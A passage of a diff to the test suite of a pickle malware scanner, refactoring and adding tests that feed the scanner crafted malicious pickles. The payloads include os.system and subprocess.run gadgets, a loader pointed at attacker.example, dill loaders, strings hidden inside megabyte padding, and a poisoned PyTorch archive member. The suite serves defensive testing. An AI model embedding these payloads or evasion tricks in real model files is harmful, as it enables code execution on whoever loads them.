"protocol0-module-memo-name", - ], -) -def test_scan_bytes_post_budget_tail_detects_mixed_prememoized_stack_global(tail: bytes) -> None: - payload = _make_pre_memoized_post_budget_stack_global_payload(tail) - - report = scan_bytes( - payload, - source="budget-prememo-mixed-stack-global.pkl", - options=ScanOptions(max_opcodes=7, post_budget_scan_bytes=4096), - ) - - assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict == SafetyVerdict.MALICIOUS - assert any( - finding.rule_code == "POST_BUDGET_GLOBAL" - and finding.severity == Severity.CRITICAL - and finding.details.get("module") == "subprocess" - and finding.details.get("name") == "run" - for finding in report.findings - ) + ], +) +def test_scan_bytes_post_budget_tail_detects_mixed_prememoized_stack_global(tail: bytes) -> None: + _assert_prememoized_stack_global_tail(tail, "budget-prememo-mixed-stack-global.pkl") @pytest.mark.parametrize( @@ -10824,23 +9173,7 @@ def test_scan_bytes_post_budget_tail_detects_mixed_prememoized_stack_global(tail ids=["dup-pop", "mark-pop", "none-pop"], ) def test_scan_bytes_post_budget_tail_detects_interleaved_prememoized_stack_global(tail: bytes) -> None: - payload = _make_pre_memoized_post_budget_stack_global_payload(tail) - - report = scan_bytes( - payload, - source="budget-prememo-interleaved-stack-global.pkl", - options=ScanOptions(max_opcodes=7, post_budget_scan_bytes=4096), - ) - - assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict == SafetyVerdict.MALICIOUS - assert any( - finding.rule_code == "POST_BUDGET_GLOBAL" - and finding.severity == Severity.CRITICAL - and finding.details.get("module") == "subprocess" - and finding.details.get("name") == "run" - for finding in report.findings - ) + _assert_prememoized_stack_global_tail(tail, "budget-prememo-interleaved-stack-global.pkl") @pytest.mark.parametrize( @@ -11077,17 +9410,11 @@ def test_scan_bytes_keeps_network_url_reducers_actionable(payload: bytes, import def test_scan_bytes_keeps_build_url_state_actionable() -> None: - payload = b"c__main__\nRemoteLoader\n)R}Vendpoint\nVhttps://attacker.example/payload\nsb." - - report = scan_bytes(payload, source="main-build-url-state.pkl") - - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.MALICIOUS - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.details.get("opcode") == "BUILD" - and finding.details.get("import_reference") == "__main__.RemoteLoader" - for finding in report.findings + _assert_state_call( + b"c__main__\nRemoteLoader\n)R}Vendpoint\nVhttps://attacker.example/payload\nsb.", + "main-build-url-state.pkl", + "BUILD", + "__main__.RemoteLoader", ) @@ -12355,31 +10682,11 @@ def test_scan_bytes_warns_when_invoked_dill_dump_origin_is_unresolved( def test_scan_bytes_flags_dill_loads_as_dangerous() -> None: - payload = b"cdill\nloads\n." - - report = scan_bytes(payload, source="dill-loads.pkl") - - assert report.verdict == SafetyVerdict.MALICIOUS - assert any( - finding.rule_code == "DANGEROUS_GLOBAL" - and finding.severity == Severity.CRITICAL - and finding.details.get("import_reference") == "dill.loads" - for finding in report.findings - ) + _assert_dill_reference_dangerous(b"cdill\nloads\n.", "dill-loads.pkl", "DANGEROUS_GLOBAL", "dill.loads") def test_scan_bytes_flags_dill_load_as_dangerous() -> None: - payload = b"cdill\nload\n." - - report = scan_bytes(payload, source="dill-load.pkl") - - assert report.verdict == SafetyVerdict.MALICIOUS - assert any( - finding.rule_code == "DANGEROUS_GLOBAL" - and finding.severity == Severity.CRITICAL - and finding.details.get("import_reference") == "dill.load" - for finding in report.findings - ) + _assert_dill_reference_dangerous(b"cdill\nload\n.", "dill-load.pkl", "DANGEROUS_GLOBAL", "dill.load") @pytest.mark.parametrize("helper", ["load_module", "load_session"]) @@ -12469,18 +10776,7 @@ def test_scan_bytes_flags_expanded_high_risk_callables(payload: bytes, expected_ def test_scan_bytes_flags_newobj_ex_dangerous_class() -> None: - payload = b"\x80\x04cos\nsystem\n)}\x92." - - report = scan_bytes(payload, source="newobj-ex.pkl") - - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.MALICIOUS - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.details.get("opcode") == "NEWOBJ_EX" - and finding.details.get("import_reference") == "os.system" - for finding in report.findings - ) + _assert_state_call(b"\x80\x04cos\nsystem\n)}\x92.", "newobj-ex.pkl", "NEWOBJ_EX", "os.system") @pytest.mark.parametrize( @@ -12685,16 +10981,11 @@ def test_scan_bytes_keeps_exact_risky_stdlib_functions_flagged( def test_scan_bytes_flags_private_dill_constructors_as_dangerous() -> None: - payload = b"\x80\x02cdill._dill\n_create_function\n)R." - - report = scan_bytes(payload, source="dill-create-function.pkl") - - assert report.verdict == SafetyVerdict.MALICIOUS - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.severity == Severity.CRITICAL - and finding.details.get("import_reference") == "dill._dill._create_function" - for finding in report.findings + _assert_dill_reference_dangerous( + b"\x80\x02cdill._dill\n_create_function\n)R.", + "dill-create-function.pkl", + "DANGEROUS_CALL", + "dill._dill._create_function", ) @@ -12786,13 +11077,7 @@ def test_scan_bytes_allows_source_available_import_only_global_with_inert_initia encoding="utf-8", ) monkeypatch.syspath_prepend(str(tmp_path)) - payload = f"c{module_name}\nGadget\n.".encode() - - report = scan_bytes(payload, source=f"{module_name}.pkl") - - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert all(finding.rule_code != "NON_ALLOWLISTED_GLOBAL" for finding in report.findings) + _assert_inert_source_allowed(module_name) def test_scan_bytes_uses_current_import_origin_instead_of_stale_loaded_source( @@ -12846,13 +11131,7 @@ def test_scan_bytes_allows_inert_source_with_future_import( encoding="utf-8", ) monkeypatch.syspath_prepend(str(tmp_path)) - payload = f"c{module_name}\nGadget\n.".encode() - - report = scan_bytes(payload, source=f"{module_name}.pkl") - - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert all(finding.rule_code != "NON_ALLOWLISTED_GLOBAL" for finding in report.findings) + _assert_inert_source_allowed(module_name) def test_scan_bytes_warns_when_package_shadows_inert_module_source( @@ -13793,13 +12072,7 @@ def test_scan_bytes_warns_when_inert_source_module_defines_getattr_hook( encoding="utf-8", ) monkeypatch.syspath_prepend(str(tmp_path)) - payload = f"c{module_name}\nGadget\n.".encode() - - report = scan_bytes(payload, source=f"{module_name}.pkl") - - assert report.verdict == SafetyVerdict.SUSPICIOUS - assert marker.exists() is False - assert any(finding.rule_code == "NON_ALLOWLISTED_GLOBAL" for finding in report.findings) + _assert_source_hook_rejected(module_name, marker) def test_scan_bytes_warns_when_inert_source_module_assigns_getattr_hook( @@ -13813,13 +12086,7 @@ def test_scan_bytes_warns_when_inert_source_module_assigns_getattr_hook( encoding="utf-8", ) monkeypatch.syspath_prepend(str(tmp_path)) - payload = f"c{module_name}\nGadget\n.".encode() - - report = scan_bytes(payload, source=f"{module_name}.pkl") - - assert report.verdict == SafetyVerdict.SUSPICIOUS - assert marker.exists() is False - assert any(finding.rule_code == "NON_ALLOWLISTED_GLOBAL" for finding in report.findings) + _assert_source_hook_rejected(module_name, marker) def test_scan_bytes_warns_when_inert_source_module_destructures_getattr_hook( @@ -14308,24 +12575,8 @@ def test_scan_file_warns_when_trusted_framework_reference_is_rebound_before_scan "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(payload_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert not (output["status"] == ScanStatus.COMPLETE.value and output["verdict"] == SafetyVerdict.CLEAN.value) - assert output["verdict"] in {SafetyVerdict.SUSPICIOUS.value, SafetyVerdict.MALICIOUS.value} - assert any( - finding["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and finding["import_reference"] == "transformers.training_args.TrainingArguments" - for finding in output["findings"] + _assert_rebound_framework_subprocess( + tmp_path, payload_path, marker, site_packages, script, "transformers.training_args.TrainingArguments" ) @@ -14369,24 +12620,8 @@ def test_scan_file_warns_when_framework_metadata_rebound_to_buildable_instance_b "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(payload_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert not (output["status"] == ScanStatus.COMPLETE.value and output["verdict"] == SafetyVerdict.CLEAN.value) - assert output["verdict"] in {SafetyVerdict.SUSPICIOUS.value, SafetyVerdict.MALICIOUS.value} - assert any( - finding["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and finding["import_reference"] == "transformers.training_args.OptimizerNames" - for finding in output["findings"] + _assert_rebound_framework_subprocess( + tmp_path, payload_path, marker, site_packages, script, "transformers.training_args.OptimizerNames" ) @@ -14422,24 +12657,8 @@ def test_scan_file_warns_when_unloaded_source_backed_metadata_import_is_not_iner "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(payload_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert not (output["status"] == ScanStatus.COMPLETE.value and output["verdict"] == SafetyVerdict.CLEAN.value) - assert output["verdict"] in {SafetyVerdict.SUSPICIOUS.value, SafetyVerdict.MALICIOUS.value} - assert any( - finding["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and finding["import_reference"] == "transformers.training_args.OptimizerNames" - for finding in output["findings"] + _assert_rebound_framework_subprocess( + tmp_path, payload_path, marker, site_packages, script, "transformers.training_args.OptimizerNames" ) @@ -14475,24 +12694,8 @@ def test_scan_file_warns_when_source_backed_framework_reference_is_unloaded_befo "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(payload_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert not (output["status"] == ScanStatus.COMPLETE.value and output["verdict"] == SafetyVerdict.CLEAN.value) - assert output["verdict"] in {SafetyVerdict.SUSPICIOUS.value, SafetyVerdict.MALICIOUS.value} - assert any( - finding["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and finding["import_reference"] == "transformers.training_args.TrainingArguments" - for finding in output["findings"] + _assert_rebound_framework_subprocess( + tmp_path, payload_path, marker, site_packages, script, "transformers.training_args.TrainingArguments" ) @@ -14843,24 +13046,8 @@ def test_scan_file_warns_when_rebound_framework_class_uses_descriptor_new_before "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(payload_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert not (output["status"] == ScanStatus.COMPLETE.value and output["verdict"] == SafetyVerdict.CLEAN.value) - assert output["verdict"] in {SafetyVerdict.SUSPICIOUS.value, SafetyVerdict.MALICIOUS.value} - assert any( - finding["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and finding["import_reference"] == "transformers.training_args.TrainingArguments" - for finding in output["findings"] + _assert_rebound_framework_subprocess( + tmp_path, payload_path, marker, site_packages, script, "transformers.training_args.TrainingArguments" ) @@ -15316,16 +13503,7 @@ def test_scan_bytes_warns_on_unresolved_selected_hf_framework_metadata_reduce( name: str, monkeypatch: pytest.MonkeyPatch, ) -> None: - _force_framework_metadata_unresolved(monkeypatch) - - report = scan_bytes(_metadata_reduce_payload(module, name) + b".", source="hf-training-args-reduce.pkl") - - assert report.status in {ScanStatus.COMPLETE, ScanStatus.INCONCLUSIVE} - assert report.verdict == SafetyVerdict.SUSPICIOUS - assert any( - finding.rule_code == "NON_ALLOWLISTED_GLOBAL" and finding.details.get("import_reference") == f"{module}.{name}" - for finding in report.findings - ) + _assert_unresolved_hf_metadata_reduce(module, name, monkeypatch, "hf-training-args-reduce.pkl") @pytest.mark.parametrize( @@ -15337,16 +13515,7 @@ def test_scan_bytes_warns_on_untrusted_hf_framework_metadata_reduce( name: str, monkeypatch: pytest.MonkeyPatch, ) -> None: - _force_framework_metadata_unresolved(monkeypatch) - - report = scan_bytes(_metadata_reduce_payload(module, name) + b".", source="hf-training-args-untrusted-reduce.pkl") - - assert report.status in {ScanStatus.COMPLETE, ScanStatus.INCONCLUSIVE} - assert report.verdict == SafetyVerdict.SUSPICIOUS - assert any( - finding.rule_code == "NON_ALLOWLISTED_GLOBAL" and finding.details.get("import_reference") == f"{module}.{name}" - for finding in report.findings - ) + _assert_unresolved_hf_metadata_reduce(module, name, monkeypatch, "hf-training-args-untrusted-reduce.pkl") @pytest.mark.parametrize( @@ -16648,19 +14817,7 @@ def test_resolution_candidate_fingerprint_rejects_path_replacement_during_read( malicious_source = b"import os\nos.system('id')\n" replacement_path.write_bytes(malicious_source) displaced_path = tmp_path / "displaced.py" - original_read = os.read - replaced = False - - def replace_after_first_read(file_descriptor: int, size: int) -> bytes: - nonlocal replaced - chunk = original_read(file_descriptor, size) - if chunk and not replaced: - replaced = True - source_path.rename(displaced_path) - replacement_path.rename(source_path) - return chunk - - monkeypatch.setattr(os, "read", replace_after_first_read) + _replace_source_on_read(monkeypatch, source_path, displaced_path, replacement_path) assert _resolution_candidate_fingerprint(source_path) == (False, None) assert source_path.read_bytes() == malicious_source @@ -16677,19 +14834,7 @@ def test_read_candidate_fingerprint_rejects_path_replacement_during_read( malicious_source = b"malicious bytecode" replacement_path.write_bytes(malicious_source) displaced_path = tmp_path / "displaced.pyc" - original_read = os.read - replaced = False - - def replace_after_first_read(file_descriptor: int, size: int) -> bytes: - nonlocal replaced - chunk = original_read(file_descriptor, size) - if chunk and not replaced: - replaced = True - source_path.rename(displaced_path) - replacement_path.rename(source_path) - return chunk - - monkeypatch.setattr(os, "read", replace_after_first_read) + _replace_source_on_read(monkeypatch, source_path, displaced_path, replacement_path) assert _read_candidate_fingerprint(source_path) == (False, None) assert source_path.read_bytes() == malicious_source @@ -16705,19 +14850,7 @@ def test_resolution_extension_fingerprint_rejects_path_replacement( replacement_path = tmp_path / f"replacement{EXTENSION_SUFFIXES[0]}" replacement_path.write_bytes(b"malicious extension") displaced_path = tmp_path / f"displaced{EXTENSION_SUFFIXES[0]}" - original_fstat = os.fstat - fstat_calls = 0 - - def replace_after_second_fstat(file_descriptor: int) -> os.stat_result: - nonlocal fstat_calls - file_stat = original_fstat(file_descriptor) - fstat_calls += 1 - if fstat_calls == 2: - extension_path.rename(displaced_path) - replacement_path.rename(extension_path) - return file_stat - - monkeypatch.setattr(os, "fstat", replace_after_second_fstat) + _replace_source_after_fstat(monkeypatch, extension_path, displaced_path, replacement_path) assert _resolution_candidate_fingerprint(extension_path) == (False, None) @@ -17083,9 +15216,7 @@ def test_unanalyzed_call_graph_notice_preserves_suspicious_verdict() -> None: assert updated.metadata["analysis_incomplete"] is True -class DirectSystemPayload: - def __reduce__(self) -> tuple[Any, tuple[str]]: - return (os.system, ("id",)) +DirectSystemPayload = functools.partial(SystemCommandPayload, "id", lambda: os.system) def _alternate_platform_system_reduce_payload() -> tuple[bytes, str]: @@ -17531,71 +15662,11 @@ def test_scan_bytes_keeps_import_only_click_startup_hook_paths_unknown_after_ben def test_with_call_graph_findings_dedupes_click_startup_hook_write_when_writer_is_already_critical() -> None: - pytest.importorskip("click") - - existing_finding = Finding( - message="existing critical writer finding", - severity=Severity.CRITICAL, - location="click-startup-hook-write-dedupe.pkl", - rule_code="DANGEROUS_CALL", - details={"module": "click", "name": "echo"}, - ) - report = PickleReport( - source="click-startup-hook-write-dedupe.pkl", - status=ScanStatus.COMPLETE, - verdict=SafetyVerdict.MALICIOUS, - findings=(existing_finding,), - metadata={ - "import_references": ( - {"module": "click", "name": "open_file"}, - {"module": "click", "name": "echo"}, - ), - "callable_invocations": ( - {"module": "click", "name": "open_file"}, - {"module": "click", "name": "echo"}, - ), - }, - ) - - updated = package_api._with_call_graph_findings(report) - - assert updated.status == report.status - assert updated.verdict == report.verdict - assert updated.findings == (existing_finding,) - - -def test_with_call_graph_findings_dedupes_click_startup_hook_write_when_opener_is_already_critical() -> None: - pytest.importorskip("click") - - existing_finding = Finding( - message="existing critical opener finding", - severity=Severity.CRITICAL, - location="click-startup-hook-write-dedupe.pkl", - rule_code="DANGEROUS_CALL", - details={"module": "click", "name": "open_file"}, - ) - report = PickleReport( - source="click-startup-hook-write-dedupe.pkl", - status=ScanStatus.COMPLETE, - verdict=SafetyVerdict.MALICIOUS, - findings=(existing_finding,), - metadata={ - "import_references": ( - {"module": "click", "name": "open_file"}, - {"module": "click", "name": "echo"}, - ), - "callable_invocations": ( - {"module": "click", "name": "open_file"}, - {"module": "click", "name": "echo"}, - ), - }, - ) + _assert_critical_click_finding_deduped("existing critical writer finding", "echo") - updated = package_api._with_call_graph_findings(report) - assert updated.status == report.status - assert updated.verdict == report.verdict - assert updated.findings == (existing_finding,) +def test_with_call_graph_findings_dedupes_click_startup_hook_write_when_opener_is_already_critical() -> None: + _assert_critical_click_finding_deduped("existing critical opener finding", "open_file") def test_scan_bytes_warns_on_main_module_global_references() -> None: @@ -18548,39 +16619,11 @@ def test_scan_bytes_flags_suspicious_literal_content_across_truncated_literal_wi def test_scan_bytes_flags_suspicious_literal_content_across_default_long_literal_windows() -> None: - gap_padding = "A" * (4 * 1024 * 1024 + 2048) - hidden_payload = gap_padding + "os.system('id')" + gap_padding - - report = scan_bytes( - pickle.dumps({"code": hidden_payload}, protocol=4), - source="default-hidden-large-string.pkl", - ) - - assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict == SafetyVerdict.SUSPICIOUS - assert any( - finding.rule_code == "SUSPICIOUS_STRING" and finding.details.get("pattern") == "os.system" - for finding in report.findings - ) - assert any(notice.code == "literal_scan_truncated" for notice in report.notices) + _assert_large_literal_detected(4, 2048, "default-hidden-large-string.pkl") def test_scan_bytes_flags_suspicious_literal_content_beyond_default_prefix_suffix_windows() -> None: - gap_padding = "A" * (8 * 1024 * 1024 + 4096) - hidden_payload = gap_padding + "os.system('id')" + gap_padding - - report = scan_bytes( - pickle.dumps({"code": hidden_payload}, protocol=4), - source="middle-hidden-large-string.pkl", - ) - - assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict == SafetyVerdict.SUSPICIOUS - assert any( - finding.rule_code == "SUSPICIOUS_STRING" and finding.details.get("pattern") == "os.system" - for finding in report.findings - ) - assert any(notice.code == "literal_scan_truncated" for notice in report.notices) + _assert_large_literal_detected(8, 4096, "middle-hidden-large-string.pkl") @pytest.mark.parametrize("protocol", [0, pickle.HIGHEST_PROTOCOL]) @@ -19264,31 +17307,11 @@ def test_scan_bytes_preserves_complete_coverage_for_in_band_readonly_buffer() -> def test_scan_bytes_records_oversized_frame_notice() -> None: - report = scan_bytes(b"\x80\x04\x95\xfe\xff\xff\xff\xff\xff\xff\xff}.", source="oversized-frame.pkl") - - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.SUSPICIOUS - finding = next(finding for finding in report.findings if finding.rule_code == "STRUCTURAL_TAMPER") - assert finding.details["tamper_type"] == "oversized_frame" - assert finding.details["frame_length"] == 0xFFFFFFFFFFFFFFFE - assert finding.details["remaining_bytes"] == 2 - notice = next(notice for notice in report.notices if notice.code == "oversized_frame") - assert notice.details["frame_length"] == 0xFFFFFFFFFFFFFFFE - assert notice.details["remaining_bytes"] == 2 + _assert_frame_notice(b"\x80\x04\x95\xfe\xff\xff\xff\xff\xff\xff\xff}.", "oversized-frame.pkl", 0xFFFFFFFFFFFFFFFE) def test_scan_bytes_records_slightly_oversized_frame_notice() -> None: - report = scan_bytes(b"\x80\x04\x95\x03\x00\x00\x00\x00\x00\x00\x00}.", source="slightly-oversized-frame.pkl") - - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.SUSPICIOUS - finding = next(finding for finding in report.findings if finding.rule_code == "STRUCTURAL_TAMPER") - assert finding.details["tamper_type"] == "oversized_frame" - assert finding.details["frame_length"] == 3 - assert finding.details["remaining_bytes"] == 2 - notice = next(notice for notice in report.notices if notice.code == "oversized_frame") - assert notice.details["frame_length"] == 3 - assert notice.details["remaining_bytes"] == 2 + _assert_frame_notice(b"\x80\x04\x95\x03\x00\x00\x00\x00\x00\x00\x00}.", "slightly-oversized-frame.pkl", 3) def test_scan_bytes_accepts_exact_frame_length() -> None: @@ -19304,128 +17327,302 @@ def test_scan_bytes_accepts_exact_frame_length() -> None: def test_scan_bytes_flags_frame_crossing_stop_before_follow_on_stream() -> None: - payload = b"\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00}.\x80\x04N." + _assert_frame_boundary_violation( + b"\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00}.\x80\x04N.", "frame-crossing-stop.pkl", "stop", 2 + ) - report = scan_bytes(payload, source="frame-crossing-stop.pkl") - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.SUSPICIOUS - finding = next( - finding - for finding in report.findings - if finding.rule_code == "STRUCTURAL_TAMPER" and finding.details.get("overrun_boundary") == "stop" +def test_scan_bytes_accepts_frame_ending_before_stop() -> None: + _assert_valid_frames(b"\x80\x04\x95\x01\x00\x00\x00\x00\x00\x00\x00}.", "frame-ending-before-stop.pkl") + + +def test_scan_bytes_flags_frame_crossing_next_frame() -> None: + _assert_frame_boundary_violation( + b"\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00}\x95\x01\x00\x00\x00\x00\x00\x00\x00.", + "frame-crossing-next-frame.pkl", + "next_frame", + 1, ) - assert finding.details["tamper_type"] == "oversized_frame" - assert finding.details["frame_length"] == 5 - assert finding.details["remaining_bytes"] == 2 -def test_scan_bytes_accepts_frame_ending_before_stop() -> None: - payload = b"\x80\x04\x95\x01\x00\x00\x00\x00\x00\x00\x00}." +def test_scan_bytes_accepts_exact_adjacent_frames() -> None: + _assert_valid_frames( + b"\x80\x04\x95\x01\x00\x00\x00\x00\x00\x00\x00}\x95\x01\x00\x00\x00\x00\x00\x00\x00.", + "exact-adjacent-frames.pkl", + ) - assert pickle.loads(payload) == {} - report = scan_bytes(payload, source="frame-ending-before-stop.pkl") + +def test_scan_bytes_fails_closed_when_import_references_are_truncated() -> None: + payload = (b"cmath\nsin\n0" * 10_000) + b"cmath\ncos\n0." + + report = scan_bytes(payload, source="import-reference-cap.pkl") + + assert report.status == ScanStatus.INCONCLUSIVE + assert report.verdict == SafetyVerdict.UNKNOWN + assert report.metadata["analysis_incomplete"] is True + assert report.metadata["import_references_truncated"] is True + assert len(report.metadata["import_references"]) == 10_000 + assert not any(reference["name"] == "cos" for reference in report.metadata["import_references"]) + notice = next(notice for notice in report.notices if notice.code == "import_references_truncated") + assert notice.details["analysis_incomplete"] is True + assert notice.details["max_import_references"] == 10_000 + + +def test_scan_bytes_keeps_duplicate_import_reference_overflow_conclusive() -> None: + payload = (b"cmath\nsin\n0" * 10_001) + b"." + + report = scan_bytes(payload, source="duplicate-import-reference-cap.pkl") assert report.status == ScanStatus.COMPLETE assert report.verdict == SafetyVerdict.CLEAN - assert not any(finding.details.get("tamper_type") == "oversized_frame" for finding in report.findings) - assert not any(notice.code == "oversized_frame" for notice in report.notices) + assert report.metadata["import_references_truncated"] is False + assert "analysis_incomplete" not in report.metadata + assert len(report.metadata["import_references"]) == 10_000 + assert all(notice.code != "import_references_truncated" for notice in report.notices) -def test_scan_bytes_flags_frame_crossing_next_frame() -> None: - payload = b"\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00}\x95\x01\x00\x00\x00\x00\x00\x00\x00." +def test_scan_stream_preserves_absolute_offsets_from_current_stream_position() -> None: + prefix = b"HEADER" + payload = pickle.dumps(MaliciousPayload()) + stream = io.BytesIO(prefix + payload) + stream.seek(len(prefix)) - report = scan_bytes(payload, source="frame-crossing-next-frame.pkl") + report = PickleScanner().scan_stream(stream, source="embedded.npy", size=len(payload)) - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.SUSPICIOUS - finding = next( - finding + assert report.metadata["first_pickle_end_pos"] == len(prefix) + len(payload) + finding_positions = [ + int(match.group(1)) + for finding in report.findings + if finding.location is not None and "embedded.npy" in finding.location + for match in [re.search(r"\(pos (\d+)\)$", finding.location)] + if match is not None + ] + assert finding_positions + assert all(position >= len(prefix) for position in finding_positions) + + +def test_scan_file_scans_binary_storage_member_inside_expanded_probe_window(tmp_path: Path) -> None: + """Widening the storage probe must not drop members the 4 KiB trusted probe scanned. + + ``sample_is_prefix`` is derived from how much of the member the probe read, so a member between + the two probe sizes flips it from True to False, and the binary-pickle predicate refuses to scan + a non-STOP-terminated sample once it is no longer a prefix. + """ + hidden_payload = b"\x80\x04cos\nsystem\n(S'echo expanded-window'\ntR" + hidden_payload += b"\x00" * (5000 - len(hidden_payload)) + assert len(hidden_payload) > package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES + assert len(hidden_payload) < package_api._PICKLE_DISCOVERY_LONG_PROBE_BYTES + + entry_count = 33 + archive_path = tmp_path / "malicious-expanded-probe-window.pt" + entries: list[bytes] = [] + for index in range(entry_count): + key = _short_binunicode(f"weight_{index}".encode("ascii")) + if index == 0: + value = ( + _pytorch_rebuild_tensor_v2_payload( + key="0", + storage_name="ByteStorage", + element_count=len(hidden_payload), + ) + .removeprefix(b"\x80\x04") + .removesuffix(b".") + ) + else: + value = _pytorch_rebuild_tensor_v2_reduce_expr(key=str(index)) + entries.append(key + value) + data_pkl = b"\x80\x04" + _pytorch_empty_ordered_dict_reduce_expr() + b"(" + b"".join(entries) + b"u." + with zipfile.ZipFile(archive_path, "w") as archive: + archive.writestr("archive/data.pkl", data_pkl) + archive.writestr("archive/version", "3\n") + archive.writestr("archive/byteorder", "little") + archive.writestr("archive/data/0", hidden_payload) + for index in range(1, entry_count): + archive.writestr(f"archive/data/{index}", b"\x00" * 24) + + report = scan_file(archive_path) + + assert report.verdict == SafetyVerdict.MALICIOUS + assert any( + finding.severity == Severity.CRITICAL + and finding.details.get("module") in {"os", "posix", "nt"} + and finding.details.get("name") == "system" + and finding.location is not None + and "archive/data/0" in finding.location for finding in report.findings - if finding.rule_code == "STRUCTURAL_TAMPER" and finding.details.get("overrun_boundary") == "next_frame" ) - assert finding.details["tamper_type"] == "oversized_frame" - assert finding.details["frame_length"] == 5 - assert finding.details["remaining_bytes"] == 1 -def test_scan_bytes_accepts_exact_adjacent_frames() -> None: - payload = b"\x80\x04\x95\x01\x00\x00\x00\x00\x00\x00\x00}\x95\x01\x00\x00\x00\x00\x00\x00\x00." +@pytest.mark.parametrize( + "executable_candidate", + [ + base64.b64decode("ggEpUg=="), + base64.b64decode("ggFOMClS"), + base64.b64decode("ggEoTjEpUg=="), + b"\x82\x01q\x00N\x9400h\x00)R", + b"\x82\x01q\x00](NNNe0)R", + b"(\x82\x01)o", + b"(N0\x82\x01o", + b"\x82\x01Na", + b"\x82\x01NNs", + b"\x82\x01(Ne", + b"\x82\x01(NNu", + b"\x82\x01(N\x90", + b"\x82\x01", + b"(C\x02(.0\x82\x01o", + ], +) +def test_raw_nested_extension_reduce_candidate_routes_without_stop(executable_candidate: bytes) -> None: + assert package_api._raw_nested_extension_opcode_candidate_has_structural_signal( + executable_candidate, + [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], + ) - assert pickle.loads(payload) == {} - report = scan_bytes(payload, source="exact-adjacent-frames.pkl") - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert not any(finding.details.get("tamper_type") == "oversized_frame" for finding in report.findings) - assert not any(notice.code == "oversized_frame" for notice in report.notices) +@pytest.mark.parametrize( + "benign_candidate", + [ + b"(C\x02\x82\x01o", + ], +) +def test_raw_nested_extension_reduce_candidate_skips_removed_or_shadowed_callable(benign_candidate: bytes) -> None: + assert not package_api._raw_nested_extension_opcode_candidate_has_structural_signal( + benign_candidate, + [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], + ) + + +def test_raw_nested_extension_routes_unknown_opcode_when_fail_closed_requested() -> None: + assert package_api._raw_nested_extension_opcode_candidate_has_structural_signal( + b"\x82\x01\xff", + [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], + fail_closed_on_unknown_after_extension=True, + ) + assert not package_api._raw_nested_extension_opcode_candidate_has_structural_signal( + b"\x82\x01\xff", + [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], + ) + + +def test_raw_nested_extension_boundary_recovery_charges_shared_budget() -> None: + malformed_candidate = b"(" * 256 + b"\xff\x82\x01." + parse_budget_remaining = [3] + + assert package_api._raw_nested_extension_opcode_candidate_has_structural_signal( + malformed_candidate, + parse_budget_remaining, + ) + assert parse_budget_remaining == [0] + + +def test_raw_nested_extension_routes_live_mark_after_context_budget_exhaustion() -> None: + value = (b"(\xff" * package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES) + b"(](NNNe0\x82\x01)o" + + assert package_api._raw_nested_extension_opcode_candidate_has_structural_signal( + value, + [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], + ) + assert package_api._literal_value_has_raw_nested_security_pickle(value) + + +def test_raw_nested_extension_routes_recovered_operand_boundary() -> None: + value = b"(" + (b"N" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATE_BYTES - 2)) + b"\x82\x01)R." + + assert 